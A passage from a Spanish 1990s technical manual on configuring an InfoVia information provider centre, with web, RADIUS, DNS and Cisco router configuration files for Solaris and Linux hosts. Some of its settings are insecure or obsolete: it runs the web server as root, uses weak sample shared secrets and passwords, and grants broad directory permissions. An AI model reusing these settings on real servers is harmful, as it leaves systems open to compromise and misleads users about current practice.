opt/SUNWweb/sun_httpd. Los tres ficheros de configuracion del servidor instalado estan en el directorio /opt/SUNWweb/sun_httpd/conf. 4.1.2.1 Fichero httpd.conf ------------------ # standalone configuration (not inetd spawned) # This is the main server configuration file ServerType standalone Port 80 User nobody Group nobody ServerName maquina.subdominio.dominio.es ServerAdmin postmaster@maquina.subdominio.dominio.es ServerRoot /opt/SUNWweb/sun_httpd ErrorLog logs/error_log TransferLog logs/access_log PidFile logs/htppd.pid <VirtualHost maquina_inf> ServerName maquina_inf ServerAdmin postmaster@maquina_inf DocumentRoot /opt/SUNWweb/htdocs/maquina_inf ErrorLog logs/1-error_log TransferLog logs/1-access_log </VirtualHost> 4.1.2.2 Fichero access.conf ------------------- # access.conf: Global access configuration # Access permissions for your executable CGI programs <Directory /opt/SUNWweb/cgi-bin> Options Indexes FollowSymLinks </Directory> # Access permissions for your html files <Directory /opt/SUNWweb/htdocs> Options Indexes FollowSymLinks Includes AllowOverride All <Limit GET> order allow, deny allow from all </Limit> </Directory> # Place any other directories you wish to access here 4.1.2.3 Fichero srm.conf ---------------- # DocumentRoot /opt/SUNWweb/htdocs/maquina Alias /icons /opt/SUNWweb/images ScriptAlias /cgi-bin/ /opt/SUNWweb/cgi-bin/ # UserDir public_html DirectoryIndex index.html FancyIndexing on AddIconByType (TXT,/icons/text.xbm) text/* AddIconByType (IMG,/icons/image.xbm) image/* AddIconByType (SND,/icons/sound.xbm) audio/* AddIcon /icons/movie.xbm .mpg .qt AddIcon /icons/binary.xbm .bin AddIcon /icons/back.xbm .. AddIcon /icons/menu.xbm ^^DIRECTORY^^ AddIcon /icons/blank.xbm ^^BLANKICON^^ DefaultIcon /icons/unknown.xbm ReadmeName README HeaderName HEADER IndexIgnore */.??* *~ *# */HEADER* */README* AccessFileName .htaccess DefaultType text/plain # # Advanced topics - see tutorial # #AddEncoding x-compress Z #AddEncoding x-gzip gz # If you want to use server side includes, or CGI outside # ScriptAliased directories, uncomment the following lines. #AddType text/x-server-parsed-html .html #AddType text/x-server-parsed-html .shtml #AddType application/x-httpd-cgi .cgi 4.1.3 Configuracion del servidor de RADIUS ------------------------------------ El CPI elegido para el ejemplo permite el acceso a Internet a traves de InfoVia. Por lo tanto debera instalarse en la maquina UNIX del CPI un servidor de RADIUS que gestione el ``pool'' de direcciones de Internet y las vaya asignando a los usuarios llamantes. En el ejemplo propuesto, este ``pool'' de direcciones IP asignadas por el IANA al proveedor esta dividido a su vez en dos ``pools'', uno para el CSIV de Madrid y otro para el CSIV de Barcelona. El rango asignado al primer CSIV es el que va de la direccion 194.179.42.129 a la 194.179.42.158. El rango asignado al segundo CSIV va de la direccion 194.179.42.161 a la 194.179.42.190. Para obtener el fichero ejecutable del servidor, los ficheros fuente del servidor RADIUS deberan compilarse para una maquina UNIX de Sun con sistema operativo Solaris 2.4. En el ejemplo, el servidor RADIUS del CPI se ha instalado en el directorio: /export/home/prueba/radius_cpi_pr Los ficheros del servidor, almacenados en el directorio anterior, son los siguientes: . radius Para obtener el fichero ejecutable del servidor, los ficheros fuente del servidor RADIUS deberan compilarse para una maquina UNIX de SUN. El fichero ejecutable se ha situado en el directorio /export/home/prueba/radius_cpi_pr. Arranque desde el directorio /export/home/prueba/radius_cpi_pr del comando: nohup radius -d . & Si se quieren obtener trazas del servidor RADIUS, deberan ejecutarse desde el directorio /export/home/prueba/radius_cpi_pr los siguientes comandos: touch Activar.radius1 touch Activar.radius2 Es el fichero ejecutable del servidor. El servidor estara activo si al ejecutar el comando: ps -ef | grep radius Se obtiene como respuesta: prueba 24024 23998 4 16:28:00 pts/1 0:00 grep radius prueba 22623 1 71 Oct 16 pts/0 0:01 radius -d . Las opciones con las que se ejecuta el comando radius son: * -d <nombre_del_directorio_radius> . cfg_local_INFOVIA En este fichero se indica el nombre y el tipo del servicio ofrecido por el CPI. . clientes_INFOVIA Datos de los CSIV con los que se va a conectar el CPI. En este fichero tambien se define el comienzo y tamaño del ``pool'' de direcciones manejado por el CPI. . usuarios_INFOVIA Datos de los usuarios autorizados por el CPI. . README Este fichero contiene una ayuda que puede resultar muy util a la hora de instalar el servidor. Ademas, en el fichero /etc/services se ha de configurar el puerto UDP usado por radius. Por defecto toma 1645. En el directorio en el que se instala el servidor, se crea un subdirectorio en el que se almacenen los ficheros con las trazas de todas las conexiones hechas al servidor por parte del cliente RADIUS del CSIV al que se ha conectado el CPI. 4.1.3.1 Fichero cfg_local_INFOVIA ------------------------- # FICHERO: cfg_local_INFOVIA # ================= # Este fichero contiene los datos de configuracion de un servidor RADIUS # # El primer campo indica el tipo de dato descrito: # ALIAS ==> Nombre del servicio soportado en el servidor local. Se pueden # asignar cualquier numero de ALIAS al servicio. Por defecto # el nombre del servicio es el nombre de la maquina. # TIPO ==> Indica el tipo de servicio soportado en el servidor local. Solo # puede existir una linea de este tipo. # 1 ==> Servicio autentificado+rango IP propio. En este caso # los valores del rango IP se toman de la definicion # de los clientes. No obstante los usuarios deberan # definirse con la direccion 0xFFFFFFFF # 2 ==> Servicio autentificado. En este caso no se hace caso # del rango IP definido en el fichero de clientes. Los # usuarios deberan definirse con la direccion 0xFFFFFFFE # 3 ==> Servicio normal, en este caso se considera buena # la direccion del usuario (pudiendo ser cualquiera # incluido los valores 0xFFFFFFFF o 0xFFFFFFFE # UDP ==> Indica el puerto UDP usado por por el proceso para escuchar # peticiones. Si falta este campo se toma el puerto definido en # /etc/services. Si en el /etc/services no esta definido # se toma como puerto el valor 1645. #IDENTIFICADOR VALOR #------------- ----- ALIAS cpi_pr TIPO 1 UDP 1645 4.1.3.2 Fichero clientes_INFOVIA ------------------------ # FICHERO: clientes_INFOVIA # ================ # # Este fichero contiene una lista de cliente (maquinas IP) que # estan autorizadas a lanzar preguntas RADIUS sobre ESTE servidor # y a recibir respuestas RADIUS desde ESTE servidor. # # 1.- El primer campo es el nombre del cliente # 2.- El segundo campo es la palabra clave asociada a ese cliente. # 3.- El tercer campo es la primera direccion IP del rango de # direciones IP asignadas a los usuarios cuya autentificacion # se realiza desde ese cliente. # 4.- El cuarto campo es el tamano del rango de direcciones IP asociado # a ese cliente. # 5.- Indica el tipo de cliente (sw==INFOVIA==0) o # (hw==ASCEND==1) # 6.- Indica el puerto UDP del cliente (solo usado si es sw para # el sincronismo inicial) # 7.- Indica el password del equipo hardware asociado como cliente (solo # usado si el cliente es hardware. # 8.- Contiene la Identidad del equipo hw. Solo es significativo si # el host es el CSIV. # # CAMPOS # 1 2 3 4 5 6 7 8 172.16.192.1 ascend 194.179.42.129 30 0 1645 12345 1 172.16.193.1 ascend 194.179.42.161 30 0 1645 12345 1 4.1.3.3 Fichero usuarios_INFOVIA ------------------------ # FICHERO: usuarios_INFOVIA # ================ # # This file contains security and configuration information # for each user. The first field is the user's name. # This is followed (on the same line) with the list of authentication # requirements for that user. This can include password, user name, # and an expiration date of the user's password. When an # authentication request is received from the Pipeline, these values # are tested. A special user named "DEFAULT" can be created (and # should be placed at the end of the user file) to specify what to do # with users not contained in the user file. A special password of # "UNIX" can be specified to notify the authentication server to use # UNIX password (/etc/passwd) authentication for this user. # # Indented (with the tab character) lines following the first # line indicate the configuration values to be passed back to # the Pipeline to allow the initiation of a user session. # This can include things like the PPP configuration values. # # A pseudo user to profide a login banner and list of hosts # used when lan modem users dial in and the device is configured # for menu mode. # Este fichero contiene el formato definido por ASCEND para # su interfaz por RADIUS. # Ademas de los parametros definidos por ASCEND el sistema # INFOVIA ha definido/modificado los siguientes valores: # - SESIONES-INFOVIA = N # Donde N es el numero de sesiones simultaneas que se quieren # permitir # para cada usuario definido en el fichero. # - Framed-Address = Este parametro NO debe aparecer en el perfil # de usuario o bien tendra el valor 255.255.255.255 # En caso contrario puede provocar errores en la direccion asignada # al usuario. # A continuacion se indican varios perfiles de usuario: usu1 Password = "madrid" a) SESIONES-INFOVIA = 1, User-Service = Framed-User, Framed-Protocol = PPP, Framed-Address = 255.255.255.255, Framed-Netmask = 255.255.255.255, Ascend-Metric = 2, Framed-Routing = None, Framed-Compression = 0 Ascend-Idle-Limit = 0 4.1.4 Configuracion del servidor DNS ------------------------------ El servidor DNS se ha instalado en la misma maquina que el servidor RADIUS y el servidor NCSA. Para configurar el servidor DNS, se ha de incluir en el directorio /etc de la maquina UNIX el fichero named.boot. En este fichero se define de que dominios es servidor de nombres la maquina. Tambien se indica en que directorio se encuentran los ficheros que emplea el servidor DNS para la traduccion de nombres a direcciones, y viceversa. Para comprobar que una vez arrancada la maquina el servidor DNS esta activo, se puede emplear el comando: ps -ef | grep in.named Si el servidor esta activo, la respuesta al comando anterior sera similar a la siguiente: root 244 1 80 Dic 15 ? 50:19 /usr/sbin/in.named root 20858 8639 6 08:25:56 pts/12 0:00 grep in.named En los siguientes apartados, se adjuntan los listados de los ficheros empleados por el servidor DNS. 4.1.4.1 Fichero /etc/named.boot ----------------------- Es el primer fichero de configuracion de un servidor DNS. En este fichero se encuentran los parametros basicos. . En que directorio se encuentran los restantes ficheros que precisa el servidor DNS. . Los dominios de los que es servidor primario. . Los dominios de los que es servidor secundario. En el ejemplo no lo es de ninguno. En este fichero las lineas se comentan por medio de ``;''. El contenido del fichero /etc/named.boot es el siguiente: directory /var/named cache . db.cache primary cpi.telefonica.es db.cpi.telefonica.es primary 42.179.194.IN-ADDR.ARPA db.194.179.42 primary 10.IN-ADDR.ARPA db.10 primary 0.0.127.IN-ADDR.ARPA db.127.0.0 La primera linea no comentada señala el directorio en el que estan todos los ficheros de datos que se referencian posteriormente. En la linea que empieza por cache ..., se indica que en el fichero db.cache se encuentran los datos de los servidores de los dominios raiz. Este fichero se obtiene a traves del proveedor de Internet (IBERNET, red IRIS, ...). En las lineas que comienzan por primary se indica de que dominios es servidor primario el servidor DNS. Tambien se indican los ficheros con la informacion de esos dominios. Los dominios 42.179.194.IN-ADDR.ARPA, 10.IN-ADDR.ARPA y 0.0.127.IN-ADDR.ARPA son los que permiten dada una direccion de las clase 194.179.42.0 y 10.0.0.0, asi como la direccion 127.0.0.1, obtener el nombre correspondiente. Si fuese servidor secundario de algun dominio, se pondria en primer lugar secondary, luego el nombre del dominio del que fuese servidor secundario, en tercer lugar la direccion IP del servidor DNS primario de ese dominio, y por ultimo el nombre del fichero en el que se va a almacenar la informacion de ese dominio proporcionada por el servidor primario al secundario. 4.1.4.2 Fichero /var/named/db.cpi.telefonica.es --------------------------------------- @ IN SOA maquina.cpi.telefonica.es. postmaster.cpi.telefonica.es. ( 96013000 ; Serie 28800 ; Refresco 8 horas 7200 ; Reintento 2 horas 604800 ; Expira 7 dias 86400 ; Minimo TTL 1 dia ) IN NS minerva.ibernet.es. IN NS maquina.cpi.telefonica.es. maquina.cpi.telefonica.es. IN A 194.179.42.2 router.cpi.telefonica.es. IN A 194.179.42.1 cpi.telefonica.es. IN MX 10 194.179.42.2 El significado de este fichero es el siguiente: . @ indica que el dominio que cubre este fichero es cpi.telefonica.es. . IN indica direcciones de Internet. . SOA (``Start Of Authority''): Tipo de recurso. . maquina.cpi.telefonica.es es el nombre de la maquina en la que esta este fichero. . postmaster.cpi.telefonica.es es la direccion de correo del responsable del servidor. . El numero de serie es un entero de 32 bits que indica la version del fichero. Puede construirse como en el ejemplo o de cualquier otra forma. Cada vez que se modifica el fichero, debe incrementarse el numero de serie. . Refresco indica cada cuanto tiempo (en segundos) un servidor de nombres secundario de un dominio debe consultar al servidor primario del mismo dominio para ver si es necesaria una actualizacion. . Reintento indica cada cuanto tiempo (en segundos) intentara un servidor de nombres secundario realizar una consulta en caso de fallo. . Expiracion es el limite superior de tiempo (en segundos) que un servidor secundario usara los datos que no hayan sido refrescados. . Tiempo de vida es el numero de segundos, por defecto, que se usara en el campo de tiempo de vida de los registros de recursos que no tengan indicado explicitamente otro valor. . A continuacion, en el fichero vienen los registros de servidores de nombres (NS) donde minerva.ibernet.es es un servidor de nombres secundario y donde maquina .cpi.telefonica.es es el servidor de nombres primario. . Los siguientes registros son de direcciones (A) y es a partir de donde el servidor de nombres obtiene las direcciones. Si en la red hubiese mas maquinas que las del ejemplo, se incluiria su nombre y direccion en estos registros. . El ultimo registro es el del Mail Exchanger (MX) y especifica la maquina que sabe distribuir el correo en el dominio indicado (o a ciertas maquinas del dominio). Puede haber mas de un registro de este tipo. 4.1.4.3 Fichero /var/named/db.194.179.42 -------------------------------- @ IN SOA maquina.cpi.telefonica.es. postmaster.cpi.telefonica.es. ( 96013000 ; Serie 28800 ; Refresco 8 horas 7200 ; Reintento 2 horas 604800 ; Expira 7 dias 86400 ; Minimo TTL 1 dia ) IN NS minerva.ibernet.es. IN NS maquina.cpi.telefonica.es. 2.42.179.194.IN-ADDR.ARPA. IN PTR maquina.cpi.telefonica.es. 1.42.179.194.IN-ADDR.ARPA. IN PTR router.cpi.telefonica.es. En este fichero, los registros SOA y NS tienen el mismo significado que en el fichero anterior (vease el apartado 4.1.4.2) db.cpi.telefonica.es. Los registros de tipo PTR proporcionan informacion para obtener el nombre de una maquina a partir de la direccion IP, o a partir de un alias, obtener el nombre real de la maquina. El formato de estos registros es el siguiente: direccion _IP_al_reves.IN-ADDR.ARPA IN PTR nombre_maquina o alias _de_la_maquina.IN-ADDR.ARPA IN PTR nombre_maquina De la primera clase de registros de este tipo debe haber tantos registros como registros del tipo A haya en el fichero del apartado 4.1.4.2 (en el ejemplo el fichero db.cpi.telefonica.es). 4.1.4.4 Fichero /var/named/db.10 ------------------------ @ IN SOA maquina.cpi.telefonica.es. postmaster.cpi.telefonica.es. ( 96013000 ; Serie 28800 ; Refresco 8 horas 7200 ; Reintento 2 horas 604800 ; Expira 7 dias 86400 ; Minimo TTL 1 dia ) IN NS maquina.cpi.telefonica.es. 2.102.128.10.IN-ADDR.ARPA. IN PTR maquina-inf.telefonica.inf. Los registros de este fichero tienen el mismo significado que los del fichero anterior (apartado 4.1.4.3). Este fichero se ha incluido para que el servidor pueda resolver direcciones de InfoVia. La inclusion de este fichero evita que el servidor DNS propague preguntas sobre direcciones de InfoVia (de la clase A 10.0.0.0) a otros servidores DNS de Internet. Esto contribuye a separar claramente lo que es InfoVia de lo que es Internet. 4.1.4.5 Fichero /var/named/db.127.0.0 ----------------------------- @ IN SOA maquina.cpi.telefonica.es. postmaster.cpi.telefonica.es. ( 96013000 ; Serie 28800 ; Refresco 8 horas 7200 ; Reintento 2 horas 604800 ; Expira 7 dias 86400 ; Minimo TTL 1 dia ) IN PTR maquina.cpi.telefonica.es. 1.0.0.127.IN-ADDR.ARPA. IN PTR localhost. El registro de este fichero tienen el mismo significado que los de los dos apartados anteriores (apartado 4.1.4.3 y apartado 4.1.4.4) y permite resolver la direccion de bucle. 4.2 CONFIGURACION DEL ``ROUTER'' ---------------------------- En este apartado se adjunta el fichero de configuracion del ``router'' del ejemplo: version 10.2 ! hostname router ! enable password YYYYYYYY ! ip subnet-zero ! interface Ethernet0 ip address 10.128.102.1 255.255.255.0 secondary ip address 194.179.42.1 255.255.255.192 ! interface Serial0 no ip address encapsulation frame-relay IETF frame-relay lmi-type ccitt ! interface Serial0.1 point-to-point ip address 194.179.6.135 255.255.255.128 frame-relay interface-dlci 17 ! interface Serial0.2 point-to-point ip unnumbered Ethernet0 frame-relay interface-dlci 18 ! interface Serial0.3 point-to-point ip unnumbered Ethernet0 frame-relay interface-dlci 19 ! interface Serial1 ip unnumbered Ethernet0 shutdown ! ip default-network A.B.C.D ip route 10.2.0.0 255.254.0.0 Serial0.2 ip route 194.179.42.128 255.255.255.224 Serial0.2 ip route 172.16.192.1 255.255.255.255 Serial0.2 ip route 10.4.0.0 255.254.0.0 Serial0.3 ip route 194.179.42.160 255.255.255.224 Serial0.3 ip route 172.16.193.1 255.255.255.255 Serial0.3 ip route A.B.C.D M A .M B .M C .M D G A .G B .G C .G D ! line con 0 line aux 0 line vty 0 4 password XXXXXXXX login ! end En el fichero anterior: . XXXXXXXX representa la clave necesaria para conectarse al ``router''. . YYYYYYYY representa la clave necesaria para poder configurar el ``router''. . A.B.C.D representa la direccion IP correspondiente a la red por defecto. Se trata de direcciones proporcionadas por Internet. Todos los paquetes cuya direccion no este recogida en las tablas de rutas, se enviara a esta red por defecto a traves del ``gateway'' indicado. . M A .M B .M C .M D representa la mascara a aplicar a la red por defecto. Esta mascara la proporcionara Internet. . G A .G B .G C .G D representa el ``gateway'' a traves del cual se encamina el trafico hacia la red por defecto. Esta direccion la proporcionara Internet. En el acceso a Internet a traves de InfoVia el rango o ``pool'' de direcciones de Internet lo concede el CPI, en concreto el servidor RADIUS del CPI. En el ejemplo se han supuesto dos ``pools'' de 30 direcciones cada uno. Uno de estos ``pools'' es para asignar direcciones IP a los usuarios llamantes al CSIV de Madrid, y el otro ``pool'' es para asignar direcciones IP a los usuarios llamantes al CSIV de Barcelona. El ``pool'' correspondiente al CSIV de Madrid va de la direccion 194.179.42.129 a la 194.179.42.158. El ``pool'' correspondiente al CSIV de Barcelona va de la direccion 194.179.42.161 a la 194.179.42.190. En ambos casos se trata de rangos contenidos en una subred de 32 maquinas, por lo que la mascara a emplear es 255.255.255.224. Para que llegue la informacion a los usuarios llamantes con direcciones IP dentro de ese rango, es preciso habilitar dos rutas en el ``router'' con los dos CSIV de InfoVia (Madrid y Barcelona) a los que esta conectado. Estas rutas estan recogidas en el fichero de configuracion anterior: ip route 194.179.42.128 255.255.255.224 Serial0.2 ip route 194.179.42.160 255.255.255.224 Serial0.3 El ``router'' del CPI ha de saber por donde encaminar el trafico con destino a los usuarios de InfoVia. Para ello se han de definir rutas con los CSIV de InfoVia con los que esta conectado el CPI. ip route 10.2.0.0 255.254.0.0 Serial0.2 ip route 10.4.0.0 255.254.0.0 Serial0.3 Por ultimo se han de definir dos rutas que permitan al servidor de RADIUS del CPI enviar la informacion a los clientes RADIUS de los CSIV de Madrid y Barcelona. Estas rutas se configuran en el ``router'' del CPI por medio de los siguientes comandos: ip route 172.16.192.1 255.255.255.255 Serial0.2 ip route 172.16.193.1 255.255.255.255 Serial0.3 4.3 CONCLUSIONES ------------ En este capitulo se ha presentado un ejemplo de un CPI, en el que se han incluido los ficheros de configuracion de los equipos del centro. Para el ejemplo se ha elegido el tipo mas complejo de CPI: el que permite el acceso a Internet a traves de InfoVia. Se ha considerado ademas un caso en el que el CPI se conecta con dos CSIV de InfoVia. La configuracion de los restantes tipos de CPI contemplados en este documento, es mas sencilla, ya que se reduce a un caso particular del ejemplo presentado en este capitulo. 5 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE PC CON SISTEMA OPERATIVO LINUX ======================================================================= Con este tercer ejemplo de configuracion de un CPI se pretende explicar como instalar un CPI, del mismo tipo que el presentado en el Capitulo 4, pero con equipos de otro fabricante. Es decir, con este tercer ejemplo se demuestra que la instalacion de un CPI se puede hacer con equipos de diversos fabricantes. Las caracteristicas de este CPI son las que se enumeran en la siguiente lista: . Tipo del CPI: es un CPI con acceso a Internet desde InfoVia. El CPI esta a conectado a dos CSIV de InfoVia: el CSIV de Madrid y el CSIV de Barcelona. . Servicios ofrecidos por el CPI: * Servidor de web para InfoVia. * Servidor de web para Internet. * Servicio de pasarela a Internet. . Direcciones IP del CPI: * Direcciones en InfoVia: El centro tiene asignado un rango de 256 direcciones en InfoVia. Este rango se emplea para dar direcciones de InfoVia a las maquinas del centro. Direcciones: Para las maquinas del centro: 10.128.102.0 a 10.128.102.255. * Direcciones en Internet (asignadas por el IANA al proveedor): El centro tiene asignada una clase C de direcciones en Internet: Direcciones: 194.179.42.0 a 194.179.42.255 . El servidor de RADIUS del CSIV es el que se encarga de asignar direcciones de InfoVia a los usuarios llamantes a cada uno de los CPIs conectados a ese CSIV. Son por tanto los CSIV de Madrid y Barcelona los que controlaran los ``pools'' de direcciones de InfoVia. . Para los usuarios que accedan a Internet desde InfoVia, el CPI tiene definido un ``pool'' de direcciones que puede asignar dinamicamente a los usuarios llamantes. Este ``pool'' a su vez se divide en dos rangos, uno para los usuarios llamantes al CSIV de Madrid y otro para los usuarios llamantes al CSIV de Barcelona. Este ``pool'' comprende las siguientes direcciones: * ``Pool'' de direcciones para los usuarios llamantes al CSIV de Madrid. De 194.179.42.129 a 194.179.42.158, es decir un rango de 30 direcciones. * ``Pool'' de direcciones para los usuarios llamantes al CSIV de Barcelona. De 194.179.42.161 a 194.179.42.190, es decir un rango de 30 direcciones. Cuando cualquiera de los dos CSIV (Madrid o Barcelona) detecta que un usuario quiere acceder a Internet a traves de este CPI, el cliente de RADIUS del CSIV correspondiente consultara al servidor RADIUS del CPI elegido por el usuario llamante. El equipamiento del CPI es el siguiente: . Una maquina PC Compatible, con procesador 386 o superior, equipada con dos tarjetas de interfaz ethernet. El sistema operativo instalado es el Linux 1.2.13 o superior. . Un ``router'' CISCO 2500, equipado con una interfaz ethernet y dos interfaces serie. Solo se van a emplear la interfaz ethernet y una de las interfaces serie. . Un enlace ``frame-relay'' a 64 Kbit/s con tres PVCs, el 17 (para Internet), el 18 (para el CSIV de Madrid), y el 19 (para el CSIV de Barcelona). Cada PVC garantiza una velocidad minima de 16 Kbit/s. . La RAL del CPI es Ethernet 10 Base 2. 5.1 CONFIGURACION DE LA MAQUINA LINUX --------------------------------- En la maquina Linux del CPI se han instalado los siguientes servidores: . Un servidor de web NCSA. Se configura de modo que se comporte como dos servidores de web independientes, uno atendiendo a los accesos que llegan por la interfaz eth0 (Internet) y el otro atendiendo los accesos que llegan por la interfaz eth1 (InfoVia). . Un servidor de RADIUS cuya mision es la de asignar dinamicamente las direc- ciones del ``pool'' de direcciones de Internet manejado por el CPI. . Un servidor DNS. En los siguientes puntos se detalla la configuracion de la maquina asi como de los diferentes servidores instalados en ella. 5.1.1 Instalacion de las dos tarjetas Ethernet ---------------------------------------- Para la instalacion de dos o mas tarjetas ethernet en una maquina Linux pueden seguirse las instrucciones dadas en la mini-HowTo ``Multiple-Ethernet'' que se encuentra en: /usr/doc/faq/howto/mini/Multiple-Ethernet.gz En concreto, en el fichero /etc/lilo.conf, debe incluirse una linea que ponga lo siguiente: append=''ether=0,0,eth0 ether=0,0,eth1'' Una vez hecho esto, debe ejecutarse lilo. 5.1.2 Configuracion de direcciones, interfaces y rutas. ------------------------------------------------- La maquina dispone de dos interfaces, la eth0 y la eth1, a las que se le asignan las siguientes direcciones IP: . Direccion IP de la tarjeta eth0 (Internet): 194.179.42.2 . Direccion IP de la tarjeta eth1 (InfoVia): 10.128.102.2 El que la maquina Linux necesite dos tarjetas de interfaz de RAL se debe a que el ``Kernel'' no admite multiples direcciones IP para una unica interfaz. En el ejemplo se ha supuesto que el proveedor divide la clase C (256 direcciones) que se le ha concedido en subredes de 64 maquinas cada una. Por otra parte, en InfoVia, para los usuarios llamantes y los CPIs se asignan direcciones de la clase A 10.0.0.0 reservada por Internet para redes privadas. Esta clase A se subdivide en dos redes, la que va de 10.0.0.0 a 10.127.255.255 para los usuarios, mientras que las direcciones 10.128.0.0 a 10.255.255.255 para los CPIs. De acuerdo con esto, las mascaras correspondientes seran: . Mascara para la direccion IP de Internet: 255.255.255.192 . Mascara para la direccion IP de InfoVia: 255.128.0.0 En lo que a rutas se refiere, ha de habilitarse una ruta que permita encaminar el trafico de los usuarios de InfoVia y el trafico con el CSIV. En esta ruta, todo el trafico de las direcciones que van de la 10.0.0.0 a la 10.127.255.255, ha de encaminarse a traves del ``router'' del CPI, el 10.128.102.1, y ademas permite que los paquetes salientes de la maquina tengan como direccion origen la de InfoVia. Los ficheros necesarios para configurar las direcciones son: . /etc/hosts . /etc/rc.d/rc.inet1 A continuacion se indica la forma de configurar las interfaces. 5.1.2.1 Configuracion de la interfaz Internet (eth0) -------------------------------------------- Para la configuracion de la primera interfaz se usara el ``script'' netconfig que ofrece el sistema operativo. Una vez invocado se contestara a las preguntas que va haciendo: . Enter hostname: maquina-in . Enter domain name for maquina-in: dom.es . Do you plan to ONLY use loopback?: NO . Enter IP address fo maquina-in (aaa.bbb.ccc.ddd): 194.179.42.2 . Enter gateway address (aaa.bbb.ccc.ddd): 194.179.42.1 . Enter netmask (aaa.bbb.ccc.ddd): 255.255.255.192 . Will you be accessing a nameserver?: NO (1) Editar el fichero /etc/hosts y añadir la linea: 194.179.42.1 router-in 5.1.2.2 Configuracion de la Interfaz InfoVia (eth1) ------------------------------------------- Editar el fichero /etc/hosts y añadir las siguientes lineas: 10.128.102.1 router-iv 10.128.102.2 maquina-iv Editar el fichero /etc/rc.d/rc.inet1, y añadir las lineas: # Configuracion de la interfaz eth1 /sbin/ifconfig eth1 10.128.102.2 broadcast 10.128.255.255 netmask 255.128.0.0 Para que el CPI pueda encaminar el trafico de los usuarios llamantes a InfoVia y que los paquetes con destino a esos usuarios tengan como direccion origen la de InfoVia, hay que incluir en el fichero la siguiente linea: /sbin/route add -net 10.0.0.0 gw 10.128.102.1 metric 1 dev eth1 Para que el CPI pueda encaminar la informacion con destino al cliente RADIUS del CSIV de InfoVia al que se ha conectado, asi como al ``router'' del CSIV al que se conecta el CPI, debe incluirse en este fichero la linea: /sbin/route add -host 172.16.192.1 gw 10.128.102.1 metric 1 dev eth1 /sbin/route add -host 172.16.193.1 gw 10.128.102.1 metric 1 dev eth1 Mover la linea /sbin/route add default gw ${GATEWAY} metric 1 al final del fichero 1 . 1. En caso de querer configurar un servidor de nombres del dominio dom.es se contestara SI a la pregunta, y a la siguiente pregunta se respondera con la direccion IP del servidor. Tambien puede hacerse editando el fichero /etc/resolv.conf y añadiendo, por cada servidor, una linea que contenga en primer lugar la palabra nameserver seguida de la direecion IP del servidor. 5.1.3 Configuracion del servidor de web --------------------------------- Se instala como superusuario un unico servidor web NCSA (http_1.5a- export_linux1.2.13.tar.Z) en la maquina Linux. El servidor queda instalado en el directorio: /usr/local/etc/httpd Debajo de este directorio se crean los directorios htdocs, htdocs-iv, logs-in y logs-iv. En el directorio /usr/local/etc/httpd/conf se renombran los siguientes archivos: access.conf-dist como access.conf httpd.conf-dist como httpd.conf localhost.srm-dist como localhost.conf srm.conf-dist como srm.conf Se edita el fichero /usr/local/etc/httpd/conf/httpd.conf y se cambian las siguientes lineas: User nobody por User root Group #-1 por Group root ServerAdmin you@your.address por ServerAdmin postmaster@maquina-in.dom.es ErrorLog logs/error_log por ErrorLog logs-in/error_log TransferLog logs/access_log por TransferLog logs-in/access_log AgentLog logs/agent_log por AgentLog logs-in/agent_log RefererLog logs/referer_log por RefererLog logs-in/refere_log PidFile logs/httpd.pid por logs-in/httpd.pid DocumentRoot /local por DocumentRoot /usr/local/etc/httpd Al final del fichero se añaden las siguientes lineas para permitir el acceso a las paginas de web desde InfoVia: <VirtualHost 10.128.102.2> ServerName maquina-iv ServerAdmin postmaster@maquina_inf DocumentRoot /usr/local/etc/htdocs-iv ErrorLog logs-iv/error_log TransferLog logs-iv/access_log AgentLog logs-iv/agent_log RefererLog logs-iv/refere_log </VirtualHost> 5.1.4 Configuracion del servidor de RADIUS ------------------------------------ El CPI elegido para el ejemplo permite el acceso a Internet a traves de InfoVia. Por lo tanto debera instalarse en la maquina Linux del CPI un servidor de RADIUS que gestione el rango de direcciones de Internet y las vaya asignando a los usuarios llamantes. En el ejemplo propuesto, este ``pool'' de direcciones IP asignadas por el IANA al proveedor esta dividido a su vez en dos ``pools'', uno para el CSIV de Madrid y otro para el CSIV de Barcelona. El rango asignado al primer CSIV es el que va de la direccion 194.179.42.129 a la 194.179.42.158. El rango asignado al segundo CSIV va de la direccion 194.179.42.161 a la 194.179.42.190. En el ejemplo, el servidor RADIUS del CPI se ha instalado en el directorio: /home/prueba/radius_cpi_pr Para obtener el fichero ejecutable del servidor, los ficheros fuente del servidor RADIUS deberan compilarse para una maquina Linux. El fichero ejecutable se ha situado en el directorio /home/prueba/radius_cpi_pr. Para el arranque del servidor, desde el directorio /home/prueba/radius_cpi_pr ha de ejecutarse el comando: nohup radiusd -d . & Si se quieren trazas del servidor, en el directorio /home/prueba/radius_cpi_pr deberan ejecutarse los siguientes comandos: touch Activar.radius1 touch Activar.radius2 El servidor estara activo si al ejecutar el comando: ps -ax | grep radiusd Se obtiene como respuesta: 12675 pp0 S N 0:00 radiusd -d . 12679 pp0 S 0:00 grep radiusd Las opciones con las que se ejecuta el comando radius son: * -d nombre_del_directorio_radius Los ficheros de configuracion del servidor, almacenados en el directorio indicado, son los mismos que se indicaron en el apartado apartado 4.1.3 del Capitulo 4. 5.1.5 Configuracion del servidor DNS ------------------------------ El servidor de nombres se arranca con el comando named del sistema operativo. Para el correcto funcionamiento del servidor DNS es necesario crear los ficheros de configuracion indicados en el apartado 4.1.4 de este documento. Para que el servidor de nombres arranque automaticamente tras un rearranque de la maquina, se editara el fichero /etc/rc.d/rc.inet2 y se borrara el caracter de comentario (#) de las siguientes lineas: # Start the NAMED/BIND name server. if [ -f ${NET}/named ]; then echo -n `` named'' ${NET}/named fi 5.2 CONFIGURACION DEL ``ROUTER'' ---------------------------- Al emplearse en este ejemplo el mismo ``router'' que en el ejemplo del Capitulo 4, el fichero de configuracion es el mismo que el recogido en el apartado 4.2 de este documento. 6 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE UNA MAQUINA CON DIGITAL UNIX ====================================================================== Con este ejemplo de configuracion de un CPI se explica como instalar un CPI, del mismo tipo que los presentados anteriormente, pero con un nuevo equipamiento. Las caracteristicas de este CPI son las siguientes . Tipo del CPI: es un CPI con acceso a Internet desde InfoVia. El CPI esta a conectado a dos CSIV de InfoVia: el CSIV de Madrid y el CSIV de Barcelona. . Servicios ofrecidos por el CPI: * Servidor de web para InfoVia. * Servidor de web para Internet. * Servicio de pasarela a Internet. . Direcciones IP del CPI: * Direcciones en InfoVia: El centro tiene asignado un rango de 256 direcciones en InfoVia. Este rango se emplea para dar direcciones de InfoVia a las maquinas del centro. Direcciones: Para las maquinas del centro: 